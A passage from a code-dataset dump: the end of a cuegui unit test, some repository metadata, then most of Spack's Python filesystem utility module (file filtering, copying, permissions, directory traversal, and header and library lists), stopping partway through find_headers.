PySide2.QtCore.Qt.AlignRight,
self.frameWidgetItem.data(
cuegui.FrameMonitorTree.PROC_COLUMN, PySide2.QtCore.Qt.TextAlignmentRole))
self.assertEqual(
cuegui.Constants.TYPE_FRAME,
self.frameWidgetItem.data(dispatch_order_col, PySide2.QtCore.Qt.UserRole))
if __name__ == '__main__':
unittest.main()
| true
| true
|
1c4472d59ef9d2f4b7feaa9217800ab5af98d094
| 54,950
|
py
|
Python
|
lib/spack/llnl/util/filesystem.py
|
BenCasses/spack
|
912dcd320a1ec624cc12986a4c0dd881276c925b
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
lib/spack/llnl/util/filesystem.py
|
BenCasses/spack
|
912dcd320a1ec624cc12986a4c0dd881276c925b
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
lib/spack/llnl/util/filesystem.py
|
BenCasses/spack
|
912dcd320a1ec624cc12986a4c0dd881276c925b
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import collections
import errno
import hashlib
import glob
import grp
import itertools
import numbers
import os
import pwd
import re
import shutil
import stat
import sys
import tempfile
from contextlib import contextmanager
import six
from llnl.util import tty
from llnl.util.lang import dedupe, memoized
from spack.util.executable import Executable
__all__ = [
'FileFilter',
'FileList',
'HeaderList',
'LibraryList',
'ancestor',
'can_access',
'change_sed_delimiter',
'copy_mode',
'filter_file',
'find',
'find_headers',
'find_all_headers',
'find_libraries',
'find_system_libraries',
'fix_darwin_install_name',
'force_remove',
'force_symlink',
'chgrp',
'chmod_x',
'copy',
'install',
'copy_tree',
'install_tree',
'is_exe',
'join_path',
'mkdirp',
'partition_path',
'prefixes',
'remove_dead_links',
'remove_directory_contents',
'remove_if_dead_link',
'remove_linked_tree',
'set_executable',
'set_install_permissions',
'touch',
'touchp',
'traverse_tree',
'unset_executable_mode',
'working_dir'
]
def path_contains_subdirectory(path, root):
norm_root = os.path.abspath(root).rstrip(os.path.sep) + os.path.sep
norm_path = os.path.abspath(path).rstrip(os.path.sep) + os.path.sep
return norm_path.startswith(norm_root)
def possible_library_filenames(library_names):
"""Given a collection of library names like 'libfoo', generate the set of
library filenames that may be found on the system (e.g. libfoo.so). This
generates the library filenames that may appear on any OS.
"""
lib_extensions = ['a', 'la', 'so', 'tbd', 'dylib']
return set(
'.'.join((lib, extension)) for lib, extension in
itertools.product(library_names, lib_extensions))
def paths_containing_libs(paths, library_names):
"""Given a collection of filesystem paths, return the list of paths that
which include one or more of the specified libraries.
"""
required_lib_fnames = possible_library_filenames(library_names)
rpaths_to_include = []
for path in paths:
fnames = set(os.listdir(path))
if fnames & required_lib_fnames:
rpaths_to_include.append(path)
return rpaths_to_include
def same_path(path1, path2):
norm1 = os.path.abspath(path1).rstrip(os.path.sep)
norm2 = os.path.abspath(path2).rstrip(os.path.sep)
return norm1 == norm2
def filter_file(regex, repl, *filenames, **kwargs):
r"""Like sed, but uses python regular expressions.
Filters every line of each file through regex and replaces the file
with a filtered version. Preserves mode of filtered files.
As with re.sub, ``repl`` can be either a string or a callable.
If it is a callable, it is passed the match object and should
return a suitable replacement string. If it is a string, it
can contain ``\1``, ``\2``, etc. to represent back-substitution
as sed would allow.
Parameters:
regex (str): The regular expression to search for
repl (str): The string to replace matches with
*filenames: One or more files to search and replace
Keyword Arguments:
string (bool): Treat regex as a plain string. Default it False
backup (bool): Make backup file(s) suffixed with ``~``. Default is True
ignore_absent (bool): Ignore any files that don't exist.
Default is False
stop_at (str): Marker used to stop scanning the file further. If a text
line matches this marker filtering is stopped and the rest of the
file is copied verbatim. Default is to filter until the end of the
file.
"""
string = kwargs.get('string', False)
backup = kwargs.get('backup', True)
ignore_absent = kwargs.get('ignore_absent', False)
stop_at = kwargs.get('stop_at', None)
# Allow strings to use \1, \2, etc. for replacement, like sed
if not callable(repl):
unescaped = repl.replace(r'\\', '\\')
def replace_groups_with_groupid(m):
def groupid_to_group(x):
return m.group(int(x.group(1)))
return re.sub(r'\\([1-9])', groupid_to_group, unescaped)
repl = replace_groups_with_groupid
if string:
regex = re.escape(regex)
for filename in filenames:
msg = 'FILTER FILE: {0} [replacing "{1}"]'
tty.debug(msg.format(filename, regex))
backup_filename = filename + "~"
tmp_filename = filename + ".spack~"
if ignore_absent and not os.path.exists(filename):
msg = 'FILTER FILE: file "{0}" not found. Skipping to next file.'
tty.debug(msg.format(filename))
continue
# Create backup file. Don't overwrite an existing backup
# file in case this file is being filtered multiple times.
if not os.path.exists(backup_filename):
shutil.copy(filename, backup_filename)
# Create a temporary file to read from. We cannot use backup_filename
# in case filter_file is invoked multiple times on the same file.
shutil.copy(filename, tmp_filename)
try:
extra_kwargs = {}
if sys.version_info > (3, 0):
extra_kwargs = {'errors': 'surrogateescape'}
# Open as a text file and filter until the end of the file is
# reached or we found a marker in the line if it was specified
with open(tmp_filename, mode='r', **extra_kwargs) as input_file:
with open(filename, mode='w', **extra_kwargs) as output_file:
# Using iter and readline is a workaround needed not to
# disable input_file.tell(), which will happen if we call
# input_file.next() implicitly via the for loop
for line in iter(input_file.readline, ''):
if stop_at is not None:
current_position = input_file.tell()
if stop_at == line.strip():
output_file.write(line)
break
filtered_line = re.sub(regex, repl, line)
output_file.write(filtered_line)
else:
current_position = None
# If we stopped filtering at some point, reopen the file in
# binary mode and copy verbatim the remaining part
if current_position and stop_at:
with open(tmp_filename, mode='rb') as input_file:
input_file.seek(current_position)
with open(filename, mode='ab') as output_file:
output_file.writelines(input_file.readlines())
except BaseException:
# clean up the original file on failure.
shutil.move(backup_filename, filename)
raise
finally:
os.remove(tmp_filename)
if not backup and os.path.exists(backup_filename):
os.remove(backup_filename)
class FileFilter(object):
"""Convenience class for calling ``filter_file`` a lot."""
def __init__(self, *filenames):
self.filenames = filenames
def filter(self, regex, repl, **kwargs):
return filter_file(regex, repl, *self.filenames, **kwargs)
def change_sed_delimiter(old_delim, new_delim, *filenames):
"""Find all sed search/replace commands and change the delimiter.
e.g., if the file contains seds that look like ``'s///'``, you can
call ``change_sed_delimiter('/', '@', file)`` to change the
delimiter to ``'@'``.
Note that this routine will fail if the delimiter is ``'`` or ``"``.
Handling those is left for future work.
Parameters:
old_delim (str): The delimiter to search for
new_delim (str): The delimiter to replace with
*filenames: One or more files to search and replace
"""
assert(len(old_delim) == 1)
assert(len(new_delim) == 1)
# TODO: handle these cases one day?
assert(old_delim != '"')
assert(old_delim != "'")
assert(new_delim != '"')
assert(new_delim != "'")
whole_lines = "^s@([^@]*)@(.*)@[gIp]$"
whole_lines = whole_lines.replace('@', old_delim)
single_quoted = r"'s@((?:\\'|[^@'])*)@((?:\\'|[^'])*)@[gIp]?'"
single_quoted = single_quoted.replace('@', old_delim)
double_quoted = r'"s@((?:\\"|[^@"])*)@((?:\\"|[^"])*)@[gIp]?"'
double_quoted = double_quoted.replace('@', old_delim)
repl = r's@\1@\2@g'
repl = repl.replace('@', new_delim)
for f in filenames:
filter_file(whole_lines, repl, f)
filter_file(single_quoted, "'%s'" % repl, f)
filter_file(double_quoted, '"%s"' % repl, f)
def set_install_permissions(path):
"""Set appropriate permissions on the installed file."""
# If this points to a file maintained in a Spack prefix, it is assumed that
# this function will be invoked on the target. If the file is outside a
# Spack-maintained prefix, the permissions should not be modified.
if os.path.islink(path):
return
if os.path.isdir(path):
os.chmod(path, 0o755)
else:
os.chmod(path, 0o644)
def group_ids(uid=None):
"""Get group ids that a uid is a member of.
Arguments:
uid (int): id of user, or None for current user
Returns:
(list of int): gids of groups the user is a member of
"""
if uid is None:
uid = os.getuid()
user = pwd.getpwuid(uid).pw_name
return [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
def chgrp(path, group):
"""Implement the bash chgrp function on a single path"""
if isinstance(group, six.string_types):
gid = grp.getgrnam(group).gr_gid
else:
gid = group
os.chown(path, -1, gid)
def chmod_x(entry, perms):
"""Implements chmod, treating all executable bits as set using the chmod
utility's `+X` option.
"""
mode = os.stat(entry).st_mode
if os.path.isfile(entry):
if not mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
perms &= ~stat.S_IXUSR
perms &= ~stat.S_IXGRP
perms &= ~stat.S_IXOTH
os.chmod(entry, perms)
def copy_mode(src, dest):
"""Set the mode of dest to that of src unless it is a link.
"""
if os.path.islink(dest):
return
src_mode = os.stat(src).st_mode
dest_mode = os.stat(dest).st_mode
if src_mode & stat.S_IXUSR:
dest_mode |= stat.S_IXUSR
if src_mode & stat.S_IXGRP:
dest_mode |= stat.S_IXGRP
if src_mode & stat.S_IXOTH:
dest_mode |= stat.S_IXOTH
os.chmod(dest, dest_mode)
def unset_executable_mode(path):
mode = os.stat(path).st_mode
mode &= ~stat.S_IXUSR
mode &= ~stat.S_IXGRP
mode &= ~stat.S_IXOTH
os.chmod(path, mode)
def copy(src, dest, _permissions=False):
"""Copies the file *src* to the file or directory *dest*.
If *dest* specifies a directory, the file will be copied into *dest*
using the base filename from *src*.
Parameters:
src (str): the file to copy
dest (str): the destination file or directory
_permissions (bool): for internal use only
"""
if _permissions:
tty.debug('Installing {0} to {1}'.format(src, dest))
else:
tty.debug('Copying {0} to {1}'.format(src, dest))
# Expand dest to its eventual full path if it is a directory.
if os.path.isdir(dest):
dest = join_path(dest, os.path.basename(src))
shutil.copy(src, dest)
if _permissions:
set_install_permissions(dest)
copy_mode(src, dest)
def install(src, dest):
"""Installs the file *src* to the file or directory *dest*.
Same as :py:func:`copy` with the addition of setting proper
permissions on the installed file.
Parameters:
src (str): the file to install
dest (str): the destination file or directory
"""
copy(src, dest, _permissions=True)
def resolve_link_target_relative_to_the_link(link):
"""
os.path.isdir uses os.path.exists, which for links will check
the existence of the link target. If the link target is relative to
the link, we need to construct a pathname that is valid from
our cwd (which may not be the same as the link's directory)
"""
target = os.readlink(link)
if os.path.isabs(target):
return target
link_dir = os.path.dirname(os.path.abspath(link))
return os.path.join(link_dir, target)
def copy_tree(src, dest, symlinks=True, ignore=None, _permissions=False):
"""Recursively copy an entire directory tree rooted at *src*.
If the destination directory *dest* does not already exist, it will
be created as well as missing parent directories.
If *symlinks* is true, symbolic links in the source tree are represented
as symbolic links in the new tree and the metadata of the original links
will be copied as far as the platform allows; if false, the contents and
metadata of the linked files are copied to the new tree.
If *ignore* is set, then each path relative to *src* will be passed to
this function; the function returns whether that path should be skipped.
Parameters:
src (str): the directory to copy
dest (str): the destination directory
symlinks (bool): whether or not to preserve symlinks
ignore (function): function indicating which files to ignore
_permissions (bool): for internal use only
"""
if _permissions:
tty.debug('Installing {0} to {1}'.format(src, dest))
else:
tty.debug('Copying {0} to {1}'.format(src, dest))
abs_src = os.path.abspath(src)
if not abs_src.endswith(os.path.sep):
abs_src += os.path.sep
abs_dest = os.path.abspath(dest)
if not abs_dest.endswith(os.path.sep):
abs_dest += os.path.sep
# Stop early to avoid unnecessary recursion if being asked to copy from a
# parent directory.
if abs_dest.startswith(abs_src):
raise ValueError('Cannot copy ancestor directory {0} into {1}'.
format(abs_src, abs_dest))
mkdirp(dest)
for s, d in traverse_tree(abs_src, abs_dest, order='pre',
follow_symlinks=not symlinks,
ignore=ignore,
follow_nonexisting=True):
if os.path.islink(s):
link_target = resolve_link_target_relative_to_the_link(s)
if symlinks:
target = os.readlink(s)
if os.path.isabs(target):
new_target = re.sub(abs_src, abs_dest, target)
if new_target != target:
tty.debug("Redirecting link {0} to {1}"
.format(target, new_target))
target = new_target
os.symlink(target, d)
elif os.path.isdir(link_target):
mkdirp(d)
else:
shutil.copyfile(s, d)
else:
if os.path.isdir(s):
mkdirp(d)
else:
shutil.copy2(s, d)
if _permissions:
set_install_permissions(d)
copy_mode(s, d)
def install_tree(src, dest, symlinks=True, ignore=None):
"""Recursively install an entire directory tree rooted at *src*.
Same as :py:func:`copy_tree` with the addition of setting proper
permissions on the installed files and directories.
Parameters:
src (str): the directory to install
dest (str): the destination directory
symlinks (bool): whether or not to preserve symlinks
ignore (function): function indicating which files to ignore
"""
copy_tree(src, dest, symlinks=symlinks, ignore=ignore, _permissions=True)
def is_exe(path):
"""True if path is an executable file."""
return os.path.isfile(path) and os.access(path, os.X_OK)
def get_filetype(path_name):
"""
Return the output of file path_name as a string to identify file type.
"""
file = Executable('file')
file.add_default_env('LC_ALL', 'C')
output = file('-b', '-h', '%s' % path_name,
output=str, error=str)
return output.strip()
def chgrp_if_not_world_writable(path, group):
"""chgrp path to group if path is not world writable"""
mode = os.stat(path).st_mode
if not mode & stat.S_IWOTH:
chgrp(path, group)
def mkdirp(*paths, **kwargs):
"""Creates a directory, as well as parent directories if needed.
Arguments:
paths (str): paths to create with mkdirp
Keyword Aguments:
mode (permission bits or None, optional): optional permissions to set
on the created directory -- use OS default if not provided
group (group name or None, optional): optional group for permissions of
final created directory -- use OS default if not provided. Only
used if world write permissions are not set
default_perms ('parents' or 'args', optional): The default permissions
that are set for directories that are not themselves an argument
for mkdirp. 'parents' means intermediate directories get the
permissions of their direct parent directory, 'args' means
intermediate get the same permissions specified in the arguments to
mkdirp -- default value is 'args'
"""
mode = kwargs.get('mode', None)
group = kwargs.get('group', None)
default_perms = kwargs.get('default_perms', 'args')
for path in paths:
if not os.path.exists(path):
try:
# detect missing intermediate folders
intermediate_folders = []
last_parent = ''
intermediate_path = os.path.dirname(path)
while intermediate_path:
if os.path.exists(intermediate_path):
last_parent = intermediate_path
break
intermediate_folders.append(intermediate_path)
intermediate_path = os.path.dirname(intermediate_path)
# create folders
os.makedirs(path)
# leaf folder permissions
if mode is not None:
os.chmod(path, mode)
if group:
chgrp_if_not_world_writable(path, group)
if mode is not None:
os.chmod(path, mode) # reset sticky grp bit post chgrp
# for intermediate folders, change mode just for newly created
# ones and if mode_intermediate has been specified, otherwise
# intermediate folders list is not populated at all and default
# OS mode will be used
if default_perms == 'args':
intermediate_mode = mode
intermediate_group = group
elif default_perms == 'parents':
stat_info = os.stat(last_parent)
intermediate_mode = stat_info.st_mode
intermediate_group = stat_info.st_gid
else:
msg = "Invalid value: '%s'. " % default_perms
msg += "Choose from 'args' or 'parents'."
raise ValueError(msg)
for intermediate_path in reversed(intermediate_folders):
if intermediate_mode is not None:
os.chmod(intermediate_path, intermediate_mode)
if intermediate_group is not None:
chgrp_if_not_world_writable(intermediate_path,
intermediate_group)
os.chmod(intermediate_path,
intermediate_mode) # reset sticky bit after
except OSError as e:
if e.errno != errno.EEXIST or not os.path.isdir(path):
raise e
elif not os.path.isdir(path):
raise OSError(errno.EEXIST, "File already exists", path)
def force_remove(*paths):
"""Remove files without printing errors. Like ``rm -f``, does NOT
remove directories."""
for path in paths:
try:
os.remove(path)
except OSError:
pass
@contextmanager
def working_dir(dirname, **kwargs):
if kwargs.get('create', False):
mkdirp(dirname)
orig_dir = os.getcwd()
os.chdir(dirname)
try:
yield
finally:
os.chdir(orig_dir)
@contextmanager
def replace_directory_transaction(directory_name, tmp_root=None):
"""Moves a directory to a temporary space. If the operations executed
within the context manager don't raise an exception, the directory is
deleted. If there is an exception, the move is undone.
Args:
directory_name (path): absolute path of the directory name
tmp_root (path): absolute path of the parent directory where to create
the temporary
Returns:
temporary directory where ``directory_name`` has been moved
"""
# Check the input is indeed a directory with absolute path.
# Raise before anything is done to avoid moving the wrong directory
assert os.path.isdir(directory_name), \
'Invalid directory: ' + directory_name
assert os.path.isabs(directory_name), \
'"directory_name" must contain an absolute path: ' + directory_name
directory_basename = os.path.basename(directory_name)
if tmp_root is not None:
assert os.path.isabs(tmp_root)
tmp_dir = tempfile.mkdtemp(dir=tmp_root)
tty.debug('TEMPORARY DIRECTORY CREATED [{0}]'.format(tmp_dir))
shutil.move(src=directory_name, dst=tmp_dir)
tty.debug('DIRECTORY MOVED [src={0}, dest={1}]'.format(
directory_name, tmp_dir
))
try:
yield tmp_dir
except (Exception, KeyboardInterrupt, SystemExit):
# Delete what was there, before copying back the original content
if os.path.exists(directory_name):
shutil.rmtree(directory_name)
shutil.move(
src=os.path.join(tmp_dir, directory_basename),
dst=os.path.dirname(directory_name)
)
tty.debug('DIRECTORY RECOVERED [{0}]'.format(directory_name))
msg = 'the transactional move of "{0}" failed.'
raise RuntimeError(msg.format(directory_name))
else:
# Otherwise delete the temporary directory
shutil.rmtree(tmp_dir)
tty.debug('TEMPORARY DIRECTORY DELETED [{0}]'.format(tmp_dir))
def hash_directory(directory, ignore=[]):
"""Hashes recursively the content of a directory.
Args:
directory (path): path to a directory to be hashed
Returns:
hash of the directory content
"""
assert os.path.isdir(directory), '"directory" must be a directory!'
md5_hash = hashlib.md5()
# Adapted from https://stackoverflow.com/a/3431835/771663
for root, dirs, files in os.walk(directory):
for name in sorted(files):
filename = os.path.join(root, name)
if filename not in ignore:
# TODO: if caching big files becomes an issue, convert this to
# TODO: read in chunks. Currently it's used only for testing
# TODO: purposes.
with open(filename, 'rb') as f:
md5_hash.update(f.read())
return md5_hash.hexdigest()
@contextmanager
def write_tmp_and_move(filename):
"""Write to a temporary file, then move into place."""
dirname = os.path.dirname(filename)
basename = os.path.basename(filename)
tmp = os.path.join(dirname, '.%s.tmp' % basename)
with open(tmp, 'w') as f:
yield f
shutil.move(tmp, filename)
@contextmanager
def open_if_filename(str_or_file, mode='r'):
"""Takes either a path or a file object, and opens it if it is a path.
If it's a file object, just yields the file object.
"""
if isinstance(str_or_file, six.string_types):
with open(str_or_file, mode) as f:
yield f
else:
yield str_or_file
def touch(path):
"""Creates an empty file at the specified path."""
perms = (os.O_WRONLY | os.O_CREAT | os.O_NONBLOCK | os.O_NOCTTY)
fd = None
try:
fd = os.open(path, perms)
os.utime(path, None)
finally:
if fd is not None:
os.close(fd)
def touchp(path):
"""Like ``touch``, but creates any parent directories needed for the file.
"""
mkdirp(os.path.dirname(path))
touch(path)
def force_symlink(src, dest):
try:
os.symlink(src, dest)
except OSError:
os.remove(dest)
os.symlink(src, dest)
def join_path(prefix, *args):
path = str(prefix)
for elt in args:
path = os.path.join(path, str(elt))
return path
def ancestor(dir, n=1):
"""Get the nth ancestor of a directory."""
parent = os.path.abspath(dir)
for i in range(n):
parent = os.path.dirname(parent)
return parent
def get_single_file(directory):
fnames = os.listdir(directory)
if len(fnames) != 1:
raise ValueError("Expected exactly 1 file, got {0}"
.format(str(len(fnames))))
return fnames[0]
@contextmanager
def temp_cwd():
tmp_dir = tempfile.mkdtemp()
try:
with working_dir(tmp_dir):
yield tmp_dir
finally:
shutil.rmtree(tmp_dir)
@contextmanager
def temp_rename(orig_path, temp_path):
same_path = os.path.realpath(orig_path) == os.path.realpath(temp_path)
if not same_path:
shutil.move(orig_path, temp_path)
try:
yield
finally:
if not same_path:
shutil.move(temp_path, orig_path)
def can_access(file_name):
"""True if we have read/write access to the file."""
return os.access(file_name, os.R_OK | os.W_OK)
def traverse_tree(source_root, dest_root, rel_path='', **kwargs):
"""Traverse two filesystem trees simultaneously.
Walks the LinkTree directory in pre or post order. Yields each
file in the source directory with a matching path from the dest
directory, along with whether the file is a directory.
e.g., for this tree::
root/
a/
file1
file2
b/
file3
When called on dest, this yields::
('root', 'dest')
('root/a', 'dest/a')
('root/a/file1', 'dest/a/file1')
('root/a/file2', 'dest/a/file2')
('root/b', 'dest/b')
('root/b/file3', 'dest/b/file3')
Keyword Arguments:
order (str): Whether to do pre- or post-order traversal. Accepted
values are 'pre' and 'post'
ignore (function): function indicating which files to ignore
follow_nonexisting (bool): Whether to descend into directories in
``src`` that do not exit in ``dest``. Default is True
follow_links (bool): Whether to descend into symlinks in ``src``
"""
follow_nonexisting = kwargs.get('follow_nonexisting', True)
follow_links = kwargs.get('follow_link', False)
# Yield in pre or post order?
order = kwargs.get('order', 'pre')
if order not in ('pre', 'post'):
raise ValueError("Order must be 'pre' or 'post'.")
# List of relative paths to ignore under the src root.
ignore = kwargs.get('ignore', None) or (lambda filename: False)
# Don't descend into ignored directories
if ignore(rel_path):
return
source_path = os.path.join(source_root, rel_path)
dest_path = os.path.join(dest_root, rel_path)
# preorder yields directories before children
if order == 'pre':
yield (source_path, dest_path)
for f in os.listdir(source_path):
source_child = os.path.join(source_path, f)
dest_child = os.path.join(dest_path, f)
rel_child = os.path.join(rel_path, f)
# Treat as a directory
# TODO: for symlinks, os.path.isdir looks for the link target. If the
# target is relative to the link, then that may not resolve properly
# relative to our cwd - see resolve_link_target_relative_to_the_link
if os.path.isdir(source_child) and (
follow_links or not os.path.islink(source_child)):
# When follow_nonexisting isn't set, don't descend into dirs
# in source that do not exist in dest
if follow_nonexisting or os.path.exists(dest_child):
tuples = traverse_tree(
source_root, dest_root, rel_child, **kwargs)
for t in tuples:
yield t
# Treat as a file.
elif not ignore(os.path.join(rel_path, f)):
yield (source_child, dest_child)
if order == 'post':
yield (source_path, dest_path)
def set_executable(path):
mode = os.stat(path).st_mode
if mode & stat.S_IRUSR:
mode |= stat.S_IXUSR
if mode & stat.S_IRGRP:
mode |= stat.S_IXGRP
if mode & stat.S_IROTH:
mode |= stat.S_IXOTH
os.chmod(path, mode)
def remove_empty_directories(root):
"""Ascend up from the leaves accessible from `root` and remove empty
directories.
Parameters:
root (str): path where to search for empty directories
"""
for dirpath, subdirs, files in os.walk(root, topdown=False):
for sd in subdirs:
sdp = os.path.join(dirpath, sd)
try:
os.rmdir(sdp)
except OSError:
pass
def remove_dead_links(root):
"""Recursively removes any dead link that is present in root.
Parameters:
root (str): path where to search for dead links
"""
for dirpath, subdirs, files in os.walk(root, topdown=False):
for f in files:
path = join_path(dirpath, f)
remove_if_dead_link(path)
def remove_if_dead_link(path):
"""Removes the argument if it is a dead link.
Parameters:
path (str): The potential dead link
"""
if os.path.islink(path) and not os.path.exists(path):
os.unlink(path)
def remove_linked_tree(path):
"""Removes a directory and its contents.
If the directory is a symlink, follows the link and removes the real
directory before removing the link.
Parameters:
path (str): Directory to be removed
"""
if os.path.exists(path):
if os.path.islink(path):
shutil.rmtree(os.path.realpath(path), True)
os.unlink(path)
else:
shutil.rmtree(path, True)
def fix_darwin_install_name(path):
"""Fix install name of dynamic libraries on Darwin to have full path.
There are two parts of this task:
1. Use ``install_name('-id', ...)`` to change install name of a single lib
2. Use ``install_name('-change', ...)`` to change the cross linking between
libs. The function assumes that all libraries are in one folder and
currently won't follow subfolders.
Parameters:
path (str): directory in which .dylib files are located
"""
libs = glob.glob(join_path(path, "*.dylib"))
for lib in libs:
# fix install name first:
install_name_tool = Executable('install_name_tool')
install_name_tool('-id', lib, lib)
otool = Executable('otool')
long_deps = otool('-L', lib, output=str).split('\n')
deps = [dep.partition(' ')[0][1::] for dep in long_deps[2:-1]]
# fix all dependencies:
for dep in deps:
for loc in libs:
# We really want to check for either
# dep == os.path.basename(loc) or
# dep == join_path(builddir, os.path.basename(loc)),
# but we don't know builddir (nor how symbolic links look
# in builddir). We thus only compare the basenames.
if os.path.basename(dep) == os.path.basename(loc):
install_name_tool('-change', dep, loc, lib)
break
def find(root, files, recursive=True):
"""Search for ``files`` starting from the ``root`` directory.
Like GNU/BSD find but written entirely in Python.
Examples:
.. code-block:: console
$ find /usr -name python
is equivalent to:
>>> find('/usr', 'python')
.. code-block:: console
$ find /usr/local/bin -maxdepth 1 -name python
is equivalent to:
>>> find('/usr/local/bin', 'python', recursive=False)
Accepts any glob characters accepted by fnmatch:
======= ====================================
Pattern Meaning
======= ====================================
* matches everything
? matches any single character
[seq] matches any character in ``seq``
[!seq] matches any character not in ``seq``
======= ====================================
Parameters:
root (str): The root directory to start searching from
files (str or collections.Sequence): Library name(s) to search for
recurse (bool, optional): if False search only root folder,
if True descends top-down from the root. Defaults to True.
Returns:
list of strings: The files that have been found
"""
if isinstance(files, six.string_types):
files = [files]
if recursive:
return _find_recursive(root, files)
else:
return _find_non_recursive(root, files)
def _find_recursive(root, search_files):
# The variable here is **on purpose** a defaultdict. The idea is that
# we want to poke the filesystem as little as possible, but still maintain
# stability in the order of the answer. Thus we are recording each library
# found in a key, and reconstructing the stable order later.
found_files = collections.defaultdict(list)
# Make the path absolute to have os.walk also return an absolute path
root = os.path.abspath(root)
for path, _, list_files in os.walk(root):
for search_file in search_files:
matches = glob.glob(os.path.join(path, search_file))
matches = [os.path.join(path, x) for x in matches]
found_files[search_file].extend(matches)
answer = []
for search_file in search_files:
answer.extend(found_files[search_file])
return answer
def _find_non_recursive(root, search_files):
# The variable here is **on purpose** a defaultdict as os.list_dir
# can return files in any order (does not preserve stability)
found_files = collections.defaultdict(list)
# Make the path absolute to have absolute path returned
root = os.path.abspath(root)
for search_file in search_files:
matches = glob.glob(os.path.join(root, search_file))
matches = [os.path.join(root, x) for x in matches]
found_files[search_file].extend(matches)
answer = []
for search_file in search_files:
answer.extend(found_files[search_file])
return answer
# Utilities for libraries and headers
class FileList(collections.Sequence):
"""Sequence of absolute paths to files.
Provides a few convenience methods to manipulate file paths.
"""
def __init__(self, files):
if isinstance(files, six.string_types):
files = [files]
self.files = list(dedupe(files))
@property
def directories(self):
"""Stable de-duplication of the directories where the files reside.
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir1/libc.a'])
>>> l.directories
['/dir1', '/dir2']
>>> h = HeaderList(['/dir1/a.h', '/dir1/b.h', '/dir2/c.h'])
>>> h.directories
['/dir1', '/dir2']
Returns:
list of strings: A list of directories
"""
return list(dedupe(
os.path.dirname(x) for x in self.files if os.path.dirname(x)
))
@property
def basenames(self):
"""Stable de-duplication of the base-names in the list
>>> l = LibraryList(['/dir1/liba.a', '/dir2/libb.a', '/dir3/liba.a'])
>>> l.basenames
['liba.a', 'libb.a']
>>> h = HeaderList(['/dir1/a.h', '/dir2/b.h', '/dir3/a.h'])
>>> h.basenames
['a.h', 'b.h']
Returns:
list of strings: A list of base-names
"""
return list(dedupe(os.path.basename(x) for x in self.files))
def __getitem__(self, item):
cls = type(self)
if isinstance(item, numbers.Integral):
return self.files[item]
return cls(self.files[item])
def __add__(self, other):
return self.__class__(dedupe(self.files + list(other)))
def __radd__(self, other):
return self.__add__(other)
def __eq__(self, other):
return self.files == other.files
def __len__(self):
return len(self.files)
def joined(self, separator=' '):
return separator.join(self.files)
def __repr__(self):
return self.__class__.__name__ + '(' + repr(self.files) + ')'
def __str__(self):
return self.joined()
class HeaderList(FileList):
"""Sequence of absolute paths to headers.
Provides a few convenience methods to manipulate header paths and get
commonly used compiler flags or names.
"""
# Make sure to only match complete words, otherwise path components such
# as "xinclude" will cause false matches.
# Avoid matching paths such as <prefix>/include/something/detail/include,
# e.g. in the CUDA Toolkit which ships internal libc++ headers.
include_regex = re.compile(r'(.*?)(\binclude\b)(.*)')
def __init__(self, files):
super(HeaderList, self).__init__(files)
self._macro_definitions = []
self._directories = None
@property
def directories(self):
"""Directories to be searched for header files."""
values = self._directories
if values is None:
values = self._default_directories()
return list(dedupe(values))
@directories.setter
def directories(self, value):
value = value or []
# Accept a single directory as input
if isinstance(value, six.string_types):
value = [value]
self._directories = [os.path.normpath(x) for x in value]
def _default_directories(self):
"""Default computation of directories based on the list of
header files.
"""
dir_list = super(HeaderList, self).directories
values = []
for d in dir_list:
# If the path contains a subdirectory named 'include' then stop
# there and don't add anything else to the path.
m = self.include_regex.match(d)
value = os.path.join(*m.group(1, 2)) if m else d
values.append(value)
return values
@property
def headers(self):
"""Stable de-duplication of the headers.
Returns:
list of strings: A list of header files
"""
return self.files
@property
def names(self):
"""Stable de-duplication of header names in the list without extensions
>>> h = HeaderList(['/dir1/a.h', '/dir2/b.h', '/dir3/a.h'])
>>> h.names
['a', 'b']
Returns:
list of strings: A list of files without extensions
"""
names = []
for x in self.basenames:
name = x
# Valid extensions include: ['.cuh', '.hpp', '.hh', '.h']
for ext in ['.cuh', '.hpp', '.hh', '.h']:
i = name.rfind(ext)
if i != -1:
names.append(name[:i])
break
else:
# No valid extension, should we still include it?
names.append(name)
return list(dedupe(names))
@property
def include_flags(self):
"""Include flags
>>> h = HeaderList(['/dir1/a.h', '/dir1/b.h', '/dir2/c.h'])
>>> h.include_flags
'-I/dir1 -I/dir2'
Returns:
str: A joined list of include flags
"""
return ' '.join(['-I' + x for x in self.directories])
@property
def macro_definitions(self):
"""Macro definitions
>>> h = HeaderList(['/dir1/a.h', '/dir1/b.h', '/dir2/c.h'])
>>> h.add_macro('-DBOOST_LIB_NAME=boost_regex')
>>> h.add_macro('-DBOOST_DYN_LINK')
>>> h.macro_definitions
'-DBOOST_LIB_NAME=boost_regex -DBOOST_DYN_LINK'
Returns:
str: A joined list of macro definitions
"""
return ' '.join(self._macro_definitions)
@property
def cpp_flags(self):
"""Include flags + macro definitions
>>> h = HeaderList(['/dir1/a.h', '/dir1/b.h', '/dir2/c.h'])
>>> h.cpp_flags
'-I/dir1 -I/dir2'
>>> h.add_macro('-DBOOST_DYN_LINK')
>>> h.cpp_flags
'-I/dir1 -I/dir2 -DBOOST_DYN_LINK'
Returns:
str: A joined list of include flags and macro definitions
"""
cpp_flags = self.include_flags
if self.macro_definitions:
cpp_flags += ' ' + self.macro_definitions
return cpp_flags
def add_macro(self, macro):
"""Add a macro definition
Parameters:
macro (str): The macro to add
"""
self._macro_definitions.append(macro)
def find_headers(headers, root, recursive=False):
"""Returns an iterable object containing a list of full paths to
headers if found.
Accepts any glob characters accepted by fnmatch:
======= ====================================
Pattern Meaning
======= ====================================
* matches everything
? matches any single character
[seq] matches any character in ``seq``
[!seq] matches any character not in ``seq``
======= ====================================
Parameters:
headers (str or list of str): Header name(s) to search for
root (str): The root directory to start searching from
recursive (bool, optional): if False search only root folder,
if True descends top-down from the root. Defaults to False.
Returns:
HeaderList: The headers that have been found
"""
